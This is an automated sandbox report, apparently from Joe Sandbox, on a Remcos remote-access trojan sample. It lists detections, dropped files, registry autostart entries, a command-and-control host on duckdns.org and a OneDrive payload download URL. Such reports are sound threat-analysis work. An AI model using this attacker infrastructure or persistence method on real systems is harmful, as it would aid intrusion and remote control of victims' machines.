                      C:\Users\Public\Libraries\Cmzcxhwn.PIF100%Joe Sandbox ML
                      C:\ProgramData\Remcos\remcos.exe71%ReversingLabsWin32.Backdoor.Remcos
                      C:\ProgramData\Remcos\remcos.exe73%VirustotalBrowse
                      C:\Users\Public\Libraries\Cmzcxhwn.PIF71%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\Public\Libraries\Cmzcxhwn.PIF73%VirustotalBrowse
                      C:\Users\Public\Libraries\easinvoker.exe0%ReversingLabs
                      C:\Users\Public\Libraries\easinvoker.exe0%VirustotalBrowse
                      C:\Users\Public\Libraries\netutils.dll83%ReversingLabsWin64.Trojan.Acll
                      C:\Users\Public\Libraries\netutils.dll68%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      dual-spov-0006.spov-msedge.net0%VirustotalBrowse
                      oceansss.duckdns.org3%VirustotalBrowse
                      geoplugin.net4%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.imvu.comr0%URL Reputationsafe
                      http://www.imvu.comr0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://aefd.nelreports.net/api/report?cat=bingth0%URL Reputationsafe
                      https://aefd.nelreports.net/api/report?cat=bingth0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                      https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                      http://geoplugin.net/json.gp/C100%URL Reputationphishing
                      https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://aefd.nelreports.net/api/report?cat=wsb0%URL Reputationsafe
                      http://geoplugin.net/json.gp100%URL Reputationphishing
                      https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
                      https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
                      http://ocsp.sectigo.com0C0%URL Reputationsafe
                      http://www.ebuddy.com0%URL Reputationsafe
                      http://geoplugin.net/json.gphB0%Avira URL Cloudsafe
                      https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c30%Avira URL Cloudsafe
                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpL0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpL90%Avira URL Cloudsafe
                      http://www.imvu.comata0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpoft0%Avira URL Cloudsafe
                      duckdns.org0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpLL0%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpL0%VirustotalBrowse
                      http://geoplugin.net/0%Avira URL Cloudsafe
                      https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be7170%Avira URL Cloudsafe
                      duckdns.org1%VirustotalBrowse
                      https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd0%Avira URL Cloudsafe
                      https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc80%Avira URL Cloudsafe
                      http://geoplugin.net/json.gpLL0%VirustotalBrowse
                      http://geoplugin.net/4%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      dual-spov-0006.spov-msedge.net
                      		13.107.139.11
                      		truefalseunknown
                      oceansss.duckdns.org
                      		103.186.117.142
                      		truetrueunknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalseunknown
                      onedrive.live.com
                      		unknown
                      		unknownfalse
                        		high
                        oqgp5g.db.files.1drv.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://onedrive.live.com/download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgcfalse
                            		high
                            duckdns.orgtrue
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://geoplugin.net/json.gptrue
                            • URL Reputation: phishing
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LObhv2770.tmp.9.drfalse
                              		high
                              https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.imvu.comrremcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://geoplugin.net/json.gphBremcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://ocsp.sectigo.com0fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://aefd.nelreports.net/api/report?cat=bingthbhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.nirsoft.netremcos.exe, 00000009.00000002.1578803145.0000000000193000.00000004.00000010.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1627422473.0000000000194000.00000004.00000010.00020000.00000000.sdmpfalse
                                		high
                                https://aefd.nelreports.net/api/report?cat=bingaotakbhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://deff.nelreports.net/api/report?cat=msnbhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://oqgp5g.db.files.1drv.com/y4mS7-09cDgh9l-spZEVYc4X4sz7LO4DIkbEuCnO10bm0osuWSl7tRLcAVFGx7-sRmqremcos.exe, 00000013.00000002.1918208186.0000000000868000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comremcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.google.comremcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://onedrive.live.com/gRremcos.exe, 00000010.00000003.1645700884.0000000000826000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://oqgp5g.db.files.1drv.com/Dremcos.exe, 00000011.00000002.1739100863.00000000009BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://oqgp5g.db.files.1drv.com/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLCejblremcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://geoplugin.net/json.gp/Cfu56fbrtn8.exe, 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmptrue
                                          • URL Reputation: phishing
                                          		unknown
                                          http://geoplugin.net/json.gpLremcos.exe, 00000006.00000003.1523378434.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3845884495.000000003369A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2205008076.0000000033696000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://onedrive.live.com/Lremcos.exe, 00000011.00000002.1739100863.0000000000926000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://live.com/fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3819338341.0000000000772000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1739100863.000000000097D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://onedrive.live.com/Bremcos.exe, 00000013.00000003.1914864143.00000000007D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://geoplugin.net/json.gpL9remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.nirsoft.net/remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.imvu.comataremcos.exe, 0000000B.00000003.1533269381.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000003.1533356581.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587508124.000000000058D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587761569.000000000058D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://oqgp5g.db.files.1drv.com/remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://oqgp5g.db.files.1drv.com/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFoUs3afu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://oqgp5g.db.files.1drv.com/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x989O9Yremcos.exe, 00000013.00000003.1914864143.000000000083A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.000000000081F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oqgp5g.db.files.1drv.com/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If59Adwremcos.exe, 00000011.00000002.1739100863.00000000009CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://live.com/Sremcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.office.com/bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                              		high
                                                              http://geoplugin.net/json.gpoftremcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://sectigo.com/CPS0fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://oqgp5g.db.files.1drv.com/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SS43X7remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://oqgp5g.db.files.1drv.com:443/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If5remcos.exe, 00000011.00000002.1739100863.00000000009CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://oqgp5g.db.files.1drv.com:443/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLCremcos.exe, 00000010.00000002.1647920314.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                      		high
                                                                      http://www.imvu.comremcos.exe, 0000000B.00000003.1533269381.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000003.1533356581.000000000056D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587508124.000000000058D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000F.00000003.1587761569.000000000058D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aefd.nelreports.net/api/report?cat=wsbbhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://geoplugin.net/json.gpLLremcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • 0%, Virustotal, Browse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://oqgp5g.db.files.1drv.com:443/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x98remcos.exe, 00000013.00000003.1914864143.000000000081F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://oqgp5g.db.files.1drv.com/)hVSfu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://oqgp5g.db.files.1drv.com:443/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFofu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEnbhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                                		high
                                                                                http://geoplugin.net/remcos.exe, 00000006.00000003.1490133116.0000000033690000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • 4%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://aefd.nelreports.net/api/report?cat=bingaotbhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                                  		high
                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgbhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                                    		high
                                                                                    https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96ddbhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://aefd.nelreports.net/api/report?cat=bingrmsbhv2770.tmp.9.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://onedrive.live.com/download?resid=FDB0512DE793B32E%21192&authkey=remcos.exe, 00000013.00000002.1928082246.00000000140F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://live.com/lremcos.exe, 00000013.00000003.1914864143.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://oqgp5g.db.files.1drv.com:443/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SSremcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.pmail.comfu56fbrtn8.exe, fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://ocsp.sectigo.com0Cfu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.ebuddy.comremcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              13.107.139.11
                                                                                              		dual-spov-0006.spov-msedge.netUnited States
                                                                                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                              178.237.33.50
                                                                                              		geoplugin.netNetherlands
                                                                                              		8455ATOM86-ASATOM86NLfalse
                                                                                              103.186.117.142
                                                                                              		oceansss.duckdns.orgunknown
                                                                                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue

                                                                                              General Information

                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                              Analysis ID:1430790
                                                                                              Start date and time:2024-04-24 07:19:38 +02:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 11m 10s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:23
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:fu56fbrtn8.exe
                                                                                              renamed because original name is a hash value
                                                                                              Original Sample Name:da7c2473b5c455f25f420827af596286.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@27/17@5/3
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              • Number of executed functions: 49
                                                                                              • Number of non-executed functions: 239
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                                                                              • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-db-files-geo.onedrive.akadns.net, odc-db-files-brs.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              07:20:28API Interceptor2x Sleep call for process: fu56fbrtn8.exe modified
                                                                                              07:20:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cmzcxhwn C:\Users\Public\Cmzcxhwn.url
                                                                                              07:20:35API Interceptor6204576x Sleep call for process: remcos.exe modified
                                                                                              07:20:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-VLI916 "C:\ProgramData\Remcos\remcos.exe"
                                                                                              07:20:45API Interceptor2x Sleep call for process: Cmzcxhwn.PIF modified
                                                                                              07:20:53AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-VLI916 "C:\ProgramData\Remcos\remcos.exe"
                                                                                              07:21:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cmzcxhwn C:\Users\Public\Cmzcxhwn.url
                                                                                              07:21:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-VLI916 "C:\ProgramData\Remcos\remcos.exe"

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              13.107.139.11FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                  https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                    XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                      Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                        ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                          20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                            20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                              disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                Oeyrmdo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  178.237.33.501713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • geoplugin.net/json.gp
                                                                                                                  #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                  • geoplugin.net/json.gp
                                                                                                                  TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • geoplugin.net/json.gp
                                                                                                                  DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                                                                                                  • geoplugin.net/json.gp
